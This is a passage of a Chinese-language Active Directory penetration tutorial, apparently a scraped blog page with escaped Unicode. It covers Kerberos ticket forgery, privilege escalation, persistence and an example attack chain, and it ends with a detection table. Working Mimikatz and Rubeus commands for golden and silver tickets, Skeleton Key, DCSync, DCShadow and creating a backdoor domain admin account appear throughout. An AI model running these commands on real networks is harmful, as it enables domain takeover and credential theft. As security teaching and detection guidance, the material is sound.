krbtgt<\/code> \u7684 NTLM Hash \u540e\uff0c\u53ef\u4ee5\u4f2a\u9020\u4efb\u610f\u7528\u6237\u7684 TGT\uff08Ticket Granting Ticket\uff09\uff0c\u4ece\u800c\u4ee5\u57df\u7ba1\u8eab\u4efd\u8bbf\u95ee\u57df\u5185\u4efb\u4f55\u8d44\u6e90\u3002krbtgt \u5bc6\u94a5\u6781\u5c11\u66f4\u6539\uff0c\u9ec4\u91d1\u7968\u636e\u7684\u6709\u6548\u671f\u53ef\u4ee5\u975e\u5e38\u957f\u3002<\/p>\n\n\n\n# Mimikatz \u751f\u6210\u5e76\u6ce8\u5165\u9ec4\u91d1\u7968\u636enkerberos::golden \/domain:corp.local \/sid:<DOMAIN_SID> \/krbtgt:<KRBTGT_HASH> \/user:Administrator \/id:500 \/pttnn# \u53c2\u6570\u8bf4\u660e:n# \/sid: \u57df\u7684 SID\uff08\u901a\u8fc7 whoami \/user \u53bb\u6389\u6700\u540e\u4e00\u6bb5\u83b7\u53d6\uff09n# \/krbtgt: krbtgt \u8d26\u6237\u7684 NTLM Hashn# \/user: \u8981\u4f2a\u9020\u7684\u7528\u6237\u540dn# \/ptt: \u76f4\u63a5\u6ce8\u5165\u5f53\u524d\u4f1a\u8bdd<\/code><\/pre>\n\n\n\n4.4 Silver Ticket \u2014 \u767d\u94f6\u7968\u636e<\/h3>\n\n\n\n
# \u4f2a\u9020 CIFS \u670d\u52a1\u7968\u636e\uff08\u8bbf\u95ee\u6587\u4ef6\u5171\u4eab\uff09nkerberos::golden \/domain:corp.local \/sid:<DOMAIN_SID> \/target:dc01.corp.local \/service:CIFS \/rc4:<MACHINE_ACCOUNT_HASH> \/user:Administrator \/pttnn# \u4f2a\u9020 HOST \u670d\u52a1\u7968\u636e\uff08\u8fdc\u7a0b\u7ba1\u7406\u3001WMI\u3001\u8ba1\u5212\u4efb\u52a1\uff09nkerberos::golden \/domain:corp.local \/sid:<DOMAIN_SID> \/target:dc01.corp.local \/service:HOST \/rc4:<MACHINE_ACCOUNT_HASH> \/user:Administrator \/pttnn# \u5e38\u7528\u670d\u52a1\u540d: CIFS(\u6587\u4ef6\u5171\u4eab), HOST(\u8fdc\u7a0b\u7ba1\u7406), HTTP(WinRM), MSSQL(SQL Server)<\/code><\/pre>\n\n\n\n4.5 Overpass-the-Hash<\/h3>\n\n\n\n
asktgt<\/code> \u547d\u4ee4\u3002<\/p>\n\n\n\n# \u7528 NTLM Hash \u7533\u8bf7 TGTnRubeus.exe asktgt \/user:admin \/rc4:<NTLM_HASH> \/domain:corp.local \/ptt<\/code><\/pre>\n\n\n\n\u4e94\u3001\u6743\u9650\u63d0\u5347<\/h2>\n\n\n\n
5.1 \u672c\u5730\u63d0\u6743<\/h3>\n\n\n\n
\u6280\u672f<\/th> \u539f\u7406<\/th> \u5de5\u5177<\/th><\/tr><\/thead> UAC Bypass<\/strong><\/td> \u7ed5\u8fc7 Windows \u7528\u6237\u8d26\u6237\u63a7\u5236\uff0c\u5c06\u6743\u9650\u4ece\u7ba1\u7406\u5458\u63d0\u5347\u5230\u9ad8\u5b8c\u6574\u6027\u7ea7\u522b\uff08\u4e0d\u76f4\u63a5\u5230 SYSTEM\uff09<\/td> fodhelper\u3001eventvwr\u3001computerdefaults \u7b49\u6ce8\u518c\u8868\u52ab\u6301\u6280\u672f<\/td><\/tr> Kernel Exploit<\/strong><\/td> \u5229\u7528 Windows\/\u7b2c\u4e09\u65b9\u9a71\u52a8\u5185\u6838\u6f0f\u6d1e\uff0c\u4ece\u4efb\u610f\u7528\u6237\u76f4\u63a5\u5230 SYSTEM<\/td> MS16-032\u3001CVE-2020-0787\uff08PrintConfig\uff09\u3001CVE-2021-36934\uff08HiveNightmare\uff09<\/td><\/tr> Potato \u7cfb\u5217<\/strong><\/td> \u5229\u7528 COM \u5bf9\u8c61 + NTLM \u53cd\u5c04\u8fdb\u884c\u4ee4\u724c\u7a83\u53d6\uff1a\u901a\u8fc7\u6b3a\u9a97 SYSTEM \u8d26\u6237\u5411\u653b\u51fb\u8005\u76d1\u542c\u7684\u7aef\u53e3\u53d1\u8d77 NTLM \u8ba4\u8bc1\uff0c\u518d\u91cd\u653e\u5230\u672c\u5730 RPC \u670d\u52a1\u4ee5\u83b7\u53d6 SYSTEM \u4ee4\u724c<\/td> JuicyPotato\u3001RoguePotato\u3001PrintSpoofer\u3001SweetPotato<\/td><\/tr> \u670d\u52a1\u52ab\u6301<\/strong><\/td> \u4fee\u6539\u4f4e\u6743\u9650\u7528\u6237\u53ef\u5199\u7684\u670d\u52a1\u8def\u5f84\/\u914d\u7f6e\uff0c\u670d\u52a1\u4ee5 SYSTEM \u542f\u52a8\u65f6\u6267\u884c\u6076\u610f\u4ee3\u7801<\/td> PowerUp.ps1\uff08Get-ModifiableService\uff09<\/td><\/tr> AlwaysInstallElevated<\/strong><\/td> \u5982\u679c\u6ce8\u518c\u8868\u4e2d\u542f\u7528\u4e86 AlwaysInstallElevated\uff08HKLM + HKCU \u90fd\u4e3a 1\uff09\uff0cMSI \u5b89\u88c5\u5305\u5c06\u4ee5 SYSTEM \u6743\u9650\u8fd0\u884c<\/td> msfvenom \u751f\u6210 MSI Payload<\/td><\/tr> \u8ba1\u5212\u4efb\u52a1<\/strong><\/td> \u52ab\u6301 SYSTEM \u6743\u9650\u7684\u8ba1\u5212\u4efb\u52a1\u4e2d\u7684\u53ef\u5199\u811a\u672c\u6216\u4e8c\u8fdb\u5236\u6587\u4ef6<\/td> PowerUp.ps1\u3001\u624b\u52a8\u6392\u67e5<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n 5.2 \u57df\u5185\u63d0\u6743<\/h3>\n\n\n\n
\u516d\u3001\u6743\u9650\u7ef4\u6301<\/h2>\n\n\n\n
6.1 \u9ec4\u91d1\u7968\u636e\u6301\u4e45\u5316<\/h3>\n\n\n\n
6.2 Skeleton Key<\/h3>\n\n\n\n
mimikatz<\/code>\uff09\u8fdb\u884c\u8ba4\u8bc1\uff0c\u540c\u65f6\u7528\u6237\u539f\u6709\u7684\u5bc6\u7801\u4f9d\u7136\u6709\u6548\uff0c\u975e\u5e38\u9690\u853d\u4e14\u96be\u4ee5\u5bdf\u89c9\u3002\u8be5\u6280\u672f\u901a\u8fc7\u5411 LSASS \u8fdb\u7a0b\u4e2d\u6ce8\u5165\u6076\u610f\u4ee3\u7801\u5b9e\u73b0\uff0c\u91cd\u542f DC \u540e\u5931\u6548\uff0c\u4f46\u53ef\u4ee5\u914d\u5408\u5176\u4ed6\u6301\u4e45\u5316\u673a\u5236\u5b9a\u671f\u91cd\u65b0\u6ce8\u5165\u3002<\/p>\n\n\n\n# Mimikatz \u5b89\u88c5 Skeleton Key\uff08\u5728 DC \u4e0a\u4ee5\u57df\u7ba1\u6743\u9650\u6267\u884c\uff09nprivilege::debugnmisc::skeletonnn# \u4e4b\u540e\u4efb\u4f55\u57df\u7528\u6237\u90fd\u53ef\u4ee5\u7528 \"mimikatz\" \u4f5c\u4e3a\u5bc6\u7801\u767b\u5f55n# net use dc01c$ \/user:corpanyuser mimikatz<\/code><\/pre>\n\n\n\n6.3 \u540e\u95e8\u8d26\u6237\u4e0e\u5f71\u5b50\u8d26\u6237<\/h3>\n\n\n\n
# \u521b\u5efa\u666e\u901a\u540e\u95e8\u7528\u6237\u5e76\u52a0\u5165\u57df\u7ba1\u7ec4nnet user backdoor P@ssw0rd123 \/add \/domainnnet group \"Domain Admins\" backdoor \/add \/domainnn# \u66f4\u9690\u853d\uff1a\u4fee\u6539\u73b0\u6709\u7528\u6237\u7684 objectSID\uff0c\u521b\u5efa\u5f71\u5b50\u8d26\u6237n# \u4f7f\u7528 Mimikatz \u7684 misc::addsid \u6216\u76f4\u63a5\u4fee\u6539 AD \u5c5e\u6027<\/code><\/pre>\n\n\n\n6.4 DCShadow<\/h3>\n\n\n\n
# DCShadow \u6267\u884c\u6b65\u9aa4:n# Step 1: \u5728\u4e00\u53f0\u6709\u57df\u7ba1\u6743\u9650\u7684\u673a\u5668\u4e0a\u542f\u52a8 Mimikatznlsadump::dcshadow \/object:CN=backdoor,... \/attribute:primaryGroupID \/value:512nn# Step 2: \u5728 DC \u4e0a\u6267\u884cnlsadump::dcshadow \/push<\/code><\/pre>\n\n\n\n\u4e03\u3001\u6838\u5fc3\u5de5\u5177\u94fe<\/h2>\n\n\n\n
\u5de5\u5177<\/th> \u7c7b\u578b<\/th> \u6838\u5fc3\u7528\u9014<\/th><\/tr><\/thead> BloodHound \/ SharpHound<\/strong><\/td> \u4fa6\u5bdf\u5206\u6790<\/td> AD \u653b\u51fb\u8def\u5f84\u53ef\u89c6\u5316\uff0cACL\/\u59d4\u6d3e\/\u4f1a\u8bdd\u5173\u7cfb\u5206\u6790<\/td><\/tr> Mimikatz<\/strong><\/td> \u51ed\u8bc1\u63d0\u53d6<\/td> LSASS \u51ed\u8bc1\u8f6c\u50a8\u3001DCSync\u3001\u7968\u636e\u64cd\u4f5c\uff08Golden\/Silver\/Skeleton Key\/DCShadow\uff09<\/td><\/tr> Impacket<\/strong><\/td> \u8fdc\u7a0b\u6267\u884c<\/td> Python \u7248 Windows \u534f\u8bae\u590d\u73b0\u2014\u2014wmiexec\u3001smbexec\u3001psexec\u3001secretsdump\u3001GetUserSPNs \u7b49\u4e00\u6574\u5957\u6a2a\u5411\u79fb\u52a8\u5de5\u5177<\/td><\/tr> Rubeus<\/strong><\/td> Kerberos \u653b\u51fb<\/td> C# \u5b9e\u73b0\u7684 Kerberos \u4ea4\u4e92\u2014\u2014AS-REP Roasting\u3001Kerberoasting\u3001Overpass-the-Hash\u3001Ticket \u5bfc\u5165\/\u5bfc\u51fa<\/td><\/tr> CrackMapExec (CME)<\/strong><\/td> \u6279\u91cf\u626b\u63cf\u4e0e\u5229\u7528<\/td> \u6279\u91cf SMB\/WinRM\/MSSQL \u767b\u5f55\u3001\u51ed\u8bc1\u55b7\u6d12\u3001BloodHound \u91c7\u96c6\u3001\u547d\u4ee4\u6267\u884c<\/td><\/tr> PowerView<\/strong><\/td> \u57df\u679a\u4e3e<\/td> PowerShell \u5199\u7684 AD \u679a\u4e3e\u5de5\u5177\uff0c\u7075\u6d3b\u67e5\u8be2\u57df\u5bf9\u8c61\uff08\u7528\u6237\/\u7ec4\/\u8ba1\u7b97\u673a\/GPO\/ACL \u7b49\uff09<\/td><\/tr> Responder<\/strong><\/td> \u4e2d\u95f4\u4eba\u653b\u51fb<\/td> \u76d1\u542c LLMNR\/NBT-NS\/mDNS \u5e7f\u64ad\uff0c\u6355\u83b7 Net-NTLM Hash\uff1b\u914d\u5408 NTLM Relay \u5b9e\u73b0\u4e2d\u7ee7\u653b\u51fb<\/td><\/tr> ntlmrelayx<\/strong><\/td> NTLM \u4e2d\u7ee7<\/td> \u5c06\u6355\u83b7\u7684 Net-NTLM \u8ba4\u8bc1\u8bf7\u6c42\u4e2d\u7ee7\u5230\u5176\u4ed6\u670d\u52a1\uff08SMB\/LDAP\/HTTP\/IMAP\uff09\uff0c\u5b9e\u73b0\u672a\u6388\u6743\u8bbf\u95ee<\/td><\/tr> Certipy<\/strong><\/td> ADCS \u653b\u51fb<\/td> AD \u8bc1\u4e66\u670d\u52a1\u653b\u51fb\u5168\u81ea\u52a8\u5316\u2014\u2014\u8bc1\u4e66\u6a21\u677f\u679a\u4e3e\u3001ESC1-ESC13 \u5168\u7cfb\u5217\u3001\u51ed\u636e\u5bfc\u51fa<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n \u516b\u3001\u653b\u51fb\u94fe\u5b9e\u6218\u6848\u4f8b<\/h2>\n\n\n\n
systeminfo<\/code> \u53d1\u73b0\u672a\u6253 KB3167679\uff08MS16-032\uff09\uff0c\u5229\u7528\u8be5\u6f0f\u6d1e\u76f4\u63a5\u63d0\u6743\u5230 SYSTEM\u3002\u540c\u65f6\u7528 SharpHound \u91c7\u96c6\u57df\u4fe1\u606f\uff0c\u5bfc\u5165 BloodHound \u5206\u6790\u3002<\/p>\n\n\n\nmimikatz sekurlsa::logonpasswords<\/code> \u5bfc\u51fa LSASS \u4e2d\u7f13\u5b58\u7684 IIS \u670d\u52a1\u8d26\u53f7\uff08svc_iis\uff09\u51ed\u8bc1\u3002\u8be5\u8d26\u53f7\u662f\u4f01\u4e1a\u6807\u51c6\u670d\u52a1\u8d26\u53f7\uff0c\u5728\u591a\u53f0\u670d\u52a1\u5668\u4e0a\u4f7f\u7528\u76f8\u540c\u5bc6\u7801\u3002<\/p>\n\n\n\nmimikatz lsadump::dcsync \/domain:corp.local \/all \/csv<\/code>\u3002\u83b7\u53d6 krbtgt Hash\uff0c\u5236\u4f5c\u9ec4\u91d1\u7968\u636e\u4f5c\u4e3a\u6301\u4e45\u5316\u540e\u95e8\u3002<\/p>\n\n\n\n\u4e5d\u3001\u9632\u5fa1\u4e0e\u68c0\u6d4b<\/h2>\n\n\n\n
\u653b\u51fb\u9636\u6bb5<\/th> \u68c0\u6d4b\u70b9<\/th> \u65e5\u5fd7\/\u76d1\u63a7\u6765\u6e90<\/th><\/tr><\/thead> \u4fa6\u5bdf<\/strong><\/td> \u5f02\u5e38 LDAP \u67e5\u8be2\u3001\u5927\u91cf SAM \u8d26\u6237\u679a\u4e3e\uff08Event ID 4662\uff09\u3001SharpHound \u7b7e\u540d\u5339\u914d<\/td> LDAP \u67e5\u8be2\u65e5\u5fd7\u3001Windows Event Log\u3001EDR \u8fdb\u7a0b\u76d1\u63a7<\/td><\/tr> \u51ed\u8bc1\u83b7\u53d6<\/strong><\/td> LSASS \u8fdb\u7a0b\u88ab\u975e\u6807\u51c6\u5de5\u5177\u8bbf\u95ee\uff08Event ID 4663\uff0cObjectType=Process\uff0cAccessMask=0x1F0FFF\uff09\u3001\u5f02\u5e38\u7684 VSS \u5377\u5f71\u590d\u5236\uff08Event ID 98\uff09<\/td> Sysmon Event 10\uff08\u8fdb\u7a0b\u8bbf\u95ee\uff09\u3001Event 11\uff08\u6587\u4ef6\u521b\u5efa\uff09<\/td><\/tr> \u6a2a\u5411\u79fb\u52a8<\/strong><\/td> \u65b0\u589e\u670d\u52a1\u521b\u5efa\uff08Event ID 7045 \u2014 psexec \u7279\u5f81\uff09\u3001WMI \u8fdc\u7a0b\u6267\u884c\uff08Event ID 4688 + \u7236\u8fdb\u7a0b wmiprvse.exe\uff09\u3001\u8ba1\u5212\u4efb\u52a1\u521b\u5efa\uff08Event ID 4698\uff09<\/td> Windows Event Log\u3001Sysmon<\/td><\/tr> \u7968\u636e\u653b\u51fb<\/strong><\/td> \u5f02\u5e38\u7684 TGT\/TGS \u8bf7\u6c42\u6a21\u5f0f\u3001\u9ec4\u91d1\u7968\u636e\u7684 PAC \u5f02\u5e38\uff08MS14-068 \u8865\u4e01\u540e\u7684\u68c0\u6d4b\u903b\u8f91\uff09\u3001\u7968\u636e\u6709\u6548\u671f\u5f02\u5e38\uff08\u9ec4\u91d1\u7968\u636e\u9ed8\u8ba4 10 \u5e74\uff09<\/td> Event ID 4769\uff08TGS \u8bf7\u6c42\uff09\u3001Event ID 4768\uff08TGT \u8bf7\u6c42\uff09<\/td><\/tr> DCSync<\/strong><\/td> Event ID 4662 \u2014 DC \u6536\u5230 DS-Replication-Get-Changes-All \u6269\u5c55\u6743\u9650\u7684\u8bbf\u95ee\uff0c\u4e14\u6765\u6e90\u4e0d\u662f\u5df2\u77e5\u7684 DC<\/td> Windows Event Log on DC<\/td><\/tr> Skeleton Key<\/strong><\/td> LSASS \u8fdb\u7a0b\u5185\u5b58\u4e2d\u7684\u4ee3\u7801\u6ce8\u5165\u68c0\u6d4b\uff08\u5bf9\u6bd4\u5df2\u77e5\u7684 LSASS \u6a21\u5757 hash\uff09<\/td> EDR \u5185\u5b58\u626b\u63cf\u3001Sysmon Event 7\uff08Image Load\uff09<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n \u5341\u3001\u603b\u7ed3<\/h2>\n\n\n\n